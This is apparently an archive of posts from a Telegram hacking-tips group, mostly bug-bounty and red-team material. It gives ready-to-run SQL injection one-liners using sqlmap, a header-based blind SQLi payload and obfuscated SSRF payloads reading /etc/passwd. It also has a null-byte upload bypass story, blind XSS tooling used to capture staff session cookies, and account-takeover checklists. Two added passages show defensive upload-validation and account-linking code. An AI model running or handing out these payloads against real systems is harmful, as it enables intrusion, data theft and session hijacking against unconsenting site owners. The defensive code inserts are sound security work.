Termux All Command [Telegram Group]
Hello, This Is the Termux All Command Official Telegram Group. All Kinds of Resources Are Shared Here. It Is Also a Backup of the Facebook Page.
Telegram Channel >> https://t.me/termuxcommandfull
Facebook Page >> https://www.facebook.com/termux.command.full
Post archive
[Red Team] Recon Techniques #1: Expanding the Attack Surface Using AS Numbers
If a company or organization has its own AS number (Autonomous System Number), we can leverage it to gather further information about IP blocks, domains, and services associated with the target organization. This technique is highly useful in the information-gathering phase to expand the attack surface.
Identifying IP blocks associated with the AS number:
$ whois -h whois.radb.net -- "-i origin $ASN" | awk '/^route:/ {print $2}' | sort -u > ip-block.txt
Scanning the status of active hosts from the IP block list:
$ nmap -sn -PS -iL ip-block.txt -v -oG ips.txt
Retrieving a list of responsive active IPs:
$ cat ips.txt | grep -i up | grep -oP '(?<=Host: )\S+' | httpx -silent
Using this technique, we can identify active and relevant services, which can then be explored further to uncover potential vulnerabilities in the identified hosts.
I found LFI Vulnerability via an Image Upload Page🎯
How I did it :
First, I used Subfinder to gather all subdomains (Tip: Always configure your API keys for the best results).
Then I used the httpx-toolkit tool to collect all alive subdomains into one file.
After that, I ran ffuf with my custom wordlist on the file.
I found an image upload page during fuzzing.
I wrote a shell script and uploaded it. To bypass the filter, I used a null-byte trick:
For example, renaming shell.hs to shell.hs%00.png (adding %00.png after shell.hs)
Finally, I discovered the LFI vulnerability
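The upload filter in the story above trusted the last extension of a percent-encoded name. As an added example (not from the original post), here is a server-side check that decodes the name first, rejects NUL and control bytes, allows a single allowlisted extension, checks the file's leading bytes and stores the file under a server-generated name. The allowlist and the names `safe_upload_name` and `RejectedUpload` are assumptions made for illustration.

```python
import os
import secrets
from urllib.parse import unquote

# Assumed allowlist: extension -> accepted leading bytes of the file content.
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

class RejectedUpload(ValueError):
    """Raised when an upload fails validation."""

def fully_decode(name, max_rounds=5):
    # Decode repeatedly so %2500 and %00 both end up as the same raw byte.
    for _ in range(max_rounds):
        decoded = unquote(name)
        if decoded == name:
            return name
        name = decoded
    raise RejectedUpload("too many encoding layers")

def safe_upload_name(client_name, content):
    name = fully_decode(client_name)
    # A NUL or other control character never belongs in a file name.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in name):
        raise RejectedUpload("control character in file name")
    base = os.path.basename(name.replace("\\", "/"))
    parts = base.lower().split(".")
    # Exactly one extension: "shell.hs.png" style names are refused.
    if len(parts) != 2 or not parts[0]:
        raise RejectedUpload("exactly one extension is allowed")
    ext = "." + parts[1]
    if ext not in MAGIC:
        raise RejectedUpload("extension not allowed")
    if not content.startswith(MAGIC[ext]):
        raise RejectedUpload("content does not match extension")
    # Never reuse the client-supplied name on disk.
    return secrets.token_hex(16) + ext
```

Store uploads outside the web root or serve them from a location where nothing is executed, so a file that slips through is still only ever returned as data.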
Another Bug Bounty Story -
🚨 Blind XSS Escalation: From Bio to Breach:
What started as a simple HTML injection vulnerability in the profile bio page escalated into a high-impact Blind XSS attack when a staff member viewed the profile in their internal system.
✅ Impact:
The payload executed in the staff panel, exposing sensitive session data like cookies, IP addresses, and full DOM access. This allowed me to capture an image of the staff panel and craft specific payloads to navigate and interact with internal systems dynamically—uncovering critical weaknesses within their infrastructure.
🎯 Recommended tools for BXSS hunters:
Online tools:
bxsshunter - https://bxsshunter.com/
Link: https[:]//bxsshunter[.]com/
bughunter - https://lnkd.in/ddUfmQx8
Link: https[:]//xss[.]bughunter[.]app/dashboard/payload
xss0r - https://xss0r.com/
Link: https[:]//xss0r[.]com
Github tool:
xsshunter - https://lnkd.in/d5jmgkhw
Link: https[:]//github[.]com/trufflesecurity/xsshunter
CloakQuest3r
CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare and other alternatives, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield. Subdomain scanning is employed as a key technique in this pursuit.
TOOL GITHUB LINK: https://lnkd.in/dvNMPuge
💡OnionGPT - Have fun! 😁
http://oniongpt6lntsoztgylhju7nmqedlq6fjexe55z327lmxyae3nutlyad[.]onion/
3 Ways to Install Packages in Kali Linux | @TechBolt27 : https://www.youtube.com/watch?v=stRLqy5ARFI
Access onion sites online without Tor browser:
https://tor2web.activetk.jp/
100 AI Tools to replace your tedious work:
1. Research
- ChatGPT
- YouChat
- Abacus
- Perplexity
- Copilot
- Gemini
2. Image
- Fotor
- Stability AI
- Midjourney
- Microsoft Designer
3. CopyWriting
- Rytr
- Copy AI
- Writesonic
- Adcreative AI
4. Writing
- Jasper
- HIX AI
- Jenny AI
- Textblaze
- Quillbot
5. Website
- 10Web
- Durable
- Framer
- Style AI
6. Video
- Klap
- Opus
- Eightify
- InVideo
- HeyGen
- Runway
- ImgCreator AI
- Morphstudio .xyz
7. Meeting
- Tldv
- Otter
- Noty AI
- Fireflies
8. SEO
- VidIQ
- Seona AI
- BlogSEO
- Keywrds ai
9. Chatbot
- Droxy
- Chatbase
- Mutual info
- Chatsimple
10. Presentation
- Decktopus
- Slides AI
- Gamma AI
- Designs AI
- Beautiful AI
11. Automation
- Make
- Zapier
- Xembly
- Bardeen
12. Prompts
- FlowGPT
- Alicent AI
- PromptBox
- Promptbase
- Snack Prompt
13. UI/UX
- Figma
- Uizard
- UiMagic
- Photoshop
14. Design
- Canva
- Flair AI
- Designify
- Clipdrop
- Autodraw
- Magician design
15. Logo Generator
- Looka
- Designs AI
- Brandmark
- Stockimg AI
- Namecheap
16. Audio
- Lovo ai
- Eleven labs
- Songburst AI
- Adobe Podcast
17. Marketing
- Pencil
- Ai-Ads
- AdCopy
- Simplified
- AdCreative
18. Startup
- Tome
- Ideas AI
- Namelix
- Pitchgrade
- Validator AI
19. Productivity
- Merlin
- Tinywow
- Notion AI
- Adobe Sensei
- Personal AI
20. Social media management
- Tapilo
- Typefully
- Hypefury
- TweetHunter
https://techtheworld.net
How I stay updated with CVEs 🔥🔥🔥 ?
$ curl -s cvedb.shodan.io/cves | jq . | grep "cve_id"
For more details 🔥
$ curl -s cvedb.shodan.io/cves | jq '[.cves[] | {cveid: .cve_id, summary: .summary}]'
Techniques and Vulnerabilities to Identify Account Takeover:
1. Pre-Account Takeover
- How to Hunt:
  - Register an email without verifying it.
  - Register again using a different method (e.g., 'sign up with Google') with the same email.
  - Check if the application links both accounts.
  - Try logging in to see if you can access information from the other account.
2. Account Takeover due to Improper Rate Limiting
- How to Hunt:
  - Capture the login request.
  - Use tools like Burp Suite's Intruder to brute-force the login.
  - Analyze the response and length to detect anomalies.
3. Account Takeover by Utilizing Sensitive Data Exposure
- How to Hunt:
  - Pay attention to the request and response parts of the application.
  - Look for exposed sensitive data like OTPs, hashes, or passwords.
4. Login Vulnerabilities
- Check for:
  - Brute-force vulnerabilities.
  - Auth misconfigurations.
  - OTP brute-forcing.
  - JWT misconfigurations.
  - SQL injection to bypass authentication.
  - Proper validation of OTP or tokens.
5. Password Reset Vulnerabilities
- Check for:
  - Brute-force vulnerabilities in password reset OTPs.
  - Predictable tokens.
  - JWT misconfigurations.
  - IDOR vulnerabilities.
  - Host header injection.
  - Leaked tokens or OTPs in HTTP responses.
  - Proper validation of OTP or tokens.
  - HTTP parameter pollution (HPP)
6. XSS to Account Takeover
#bugbounty #bugbountytips
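Item 1 of the checklist above (pre-account takeover) works when a social sign-in is merged into an account whose email was never verified. As an added example (not from the original post), this sketch shows linking logic that discards whatever an unverified registrant set before it links a provider identity. `Account`, `AccountStore` and their fields are hypothetical, and `password_hash` stands in for the output of a real password KDF.

```python
import hmac
from dataclasses import dataclass, field
from typing import Optional

@dataclass
class Account:
    email: str
    email_verified: bool = False
    password_hash: Optional[str] = None
    sessions: set = field(default_factory=set)
    identities: set = field(default_factory=set)  # e.g. {"google"}

class AccountStore:
    def __init__(self):
        self.by_email = {}

    def register_password(self, email, password_hash):
        key = email.strip().lower()
        if key in self.by_email:
            raise ValueError("email already registered")
        self.by_email[key] = Account(email=key, password_hash=password_hash)
        return self.by_email[key]

    def password_login(self, email, password_hash):
        # Unverified accounts cannot log in at all.
        acct = self.by_email.get(email.strip().lower())
        return bool(acct and acct.email_verified and acct.password_hash
                    and hmac.compare_digest(acct.password_hash, password_hash))

    def sso_login(self, provider, email, provider_says_verified):
        if not provider_says_verified:
            raise PermissionError("provider did not verify this email")
        key = email.strip().lower()
        acct = self.by_email.get(key)
        if acct is None:
            acct = Account(email=key, email_verified=True)
            self.by_email[key] = acct
        elif not acct.email_verified:
            # Whoever pre-registered never proved ownership of the mailbox:
            # drop the password and sessions they created before linking.
            acct.password_hash = None
            acct.sessions.clear()
            acct.email_verified = True
        acct.identities.add(provider)
        return acct
```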
Oneliners for SQL Injection 💉 :
$ echo http://<TARGET> | waybackurls > target.txt ; python3 sqlidetector.py -f target.txt
$ subfinder -d http://<TARGET> -silent -all | gau --blacklist ttf,woff,svg,png | sort -u | gf sqli > gf_sqli.txt; sqlmap -m gf_sqli.txt --batch --risk 3 --random-agent | tee -a sqli.txt
$ findomain -t http://<TARGET> -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1
$ cat urls.txt | grep ".php" | sed 's/\.php.*/.php\//' | sort -u | sed s/$/%27%22%60/ | while read url; do curl --silent "$url" | grep -qs "You have an error in your SQL syntax" && echo -e "$url \e[1;32mSQLI\e[0m" || echo -e "$url \e[1;31mNot Vulnerable to SQLI Injection \e[0m" ; done
- Header-Based Blind SQL injection:
$ cat domain.txt | httpx -silent -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(13),0))OR" -rt -timeout 20 -mrt '>13'
#bugbounty #bugbountytip #cybersecurity #sqli
How To Increase Max Upload File Size Importing of Large SQL files in Xampp | phpmyadmin : https://www.youtube.com/watch?v=PvSWU9huKDY
file:/etc/passwd%3F/
file:/etc%252Fpasswd/
file:/etc%252Fpasswd%3F/
file:///etc/%3F/../passwd
file:${br}/et${u}c%252Fpas${te}swd%3F/
file:$(br)/et$(u)c%252Fpas$(te)swd%3F/
use this payload for ssrf
BUG BOUNTY TIPS 💪
Top 10 Websites for Beginners to Know This.
Use For:-
1. Certificate transparency logs.
:- https://crt.sh/
2. Nuclei Templates Directory
:- https://lnkd.in/gCAnE5tR
3. Recon methodology and oneliner commands
:- https://lnkd.in/gqzkZNYN
4. Old HackerOne Reports
:- https://lnkd.in/gSwe-yuf
5. Onelinertips and Tools and Extensions
:- https://lostsec.xyz/
6. Nslookup, whois, and reverse lookup
:- https://ping.eu/
7. Check status code and response headers
:- https://httpstatus.io/
8. Create vulnerability reports
:- https://vulnrepo.com/
9. Blind XSS
:- https://xss.report/
10. Advanced search operators (Google Dorks)
:- https://lnkd.in/g2ahA3YD
#bugbounty #bugbountytip
Reduce Noise in Burp Suite with This Simple Trick! 🔥
💡 Just add the following patterns in Burp Suite under Proxy > Options > TLS Pass Through:
.*\.google\.com
.*\.gstatic\.com
.*\.googleapis\.com
.*\.pki\.goog
.*\.mozilla\..*
#bugbounty #bugbountytip
Rate Limit Bypasses?
Here are 10 blogs to learn more about it
1. https://lnkd.in/gYK4kyVU
2. https://lnkd.in/gi2QEr8P
3. https://lnkd.in/gMcSYWzw
4. https://lnkd.in/gv7HFEtf
5. https://lnkd.in/gZnq33Cd
6. https://lnkd.in/gsjiv8ff
7. https://lnkd.in/gdd4Q4_y
8. https://lnkd.in/gDwueZ9u
9. https://lnkd.in/gbTvHfFn
10. https://lnkd.in/gv8wYGdJ
I found two vulnerabilities in a public target on HackerOne in just 10 minutes🎯
How I did it :
First, I used Subfinder to gather all subdomains (Tip: Always configure your API keys for the best results).
Then I used the httpx-toolkit tool to collect all subdomains returning a 404 status code into one file.
Then I ran ffuf with my custom wordlist on the 404 subdomains, which revealed two interesting URLs:
https://[target].com/swagger/index.html
Then I used the nuclei tool with a Swagger template on the identified URLs and I discovered:
HTML Injection
Cross-Site Scripting (XSS)
#Collected
Search engine for hackers/pentesters
https://shodan.io == servers
https://google.com == dorks
https://wigle.net == wifi networks
https://grey.app == code search
https://app.binaryedge == threat intelligence
https://onyphe.io == server
https://viz.greynoise.io == threat intelligence
https://censys.io == server
https://hunter.io == email addresses
https://fofa.info == threat intelligence
https://zoomeye.org == threat intelligence
https://leakix.net == threat intelligence
https://intelx.io == OSINT
https://app.netlas.io == attack surface
https://searchcode.com == code search
https://urlscan.io == threat intelligence
https://publicwww.com == code search
https://fullhunt.io == attack surface
https://socradar.io == threat intelligence
https://binaryedge.io == attack surface
https://ivre.rocks == server
https://crt.sh == certificate search
https://vulners.com == vulnerabilities
https://pulsedive.com == threat intelligence
Real Ethical Hacking in 43 Hours: Your Fast-Track to Cybersecurity Mastery
Elevate your cybersecurity career with our comprehensive ethical hacking course.
Key Topics Covered:
* Ethical Hacking Foundations
* Introduction to Ethical Hacking
* Ethical Hacking Steps
* Creating Your Ethical Hacking Lab
* Operating System Fundamentals
* Vulnerability Assessment
* OSINT Techniques
* Storage Media
* Linux Basics
* Linux Shell
* Linux Processes
* Linux Permissions
* Network Security Concepts
* Packet Management Systems
* Network Security
* Linux File System
* Working with Archives
* Working with Processes
* Working with Users
* Networking Fundamentals
* Network Capture
* Network Scanning
* Advanced Networking Topics
* Information Gathering
* Web Application Hacking
* Detecting Web Vulnerabilities
* The Importance of Programming
* C++ and C
* SQL and Relational Databases
* Functions in C++
* Ethical Hacking for Data Scientists
* Ethical Hacking for SQL Datatypes
* Learning Python for Ethical Hacking
Gain hands-on experience with industry-standard tools like Kali Linux, Metasploit, and Nmap. Prepare for and ace certifications like CSEH and CEH.
Download Link: https://lnkd.in/dnXx6G6H
A Chrome extension that keeps track of the injected urls with Blind XSS payloads
🔗 GitHub Link: https://lnkd.in/gmQscCKZ
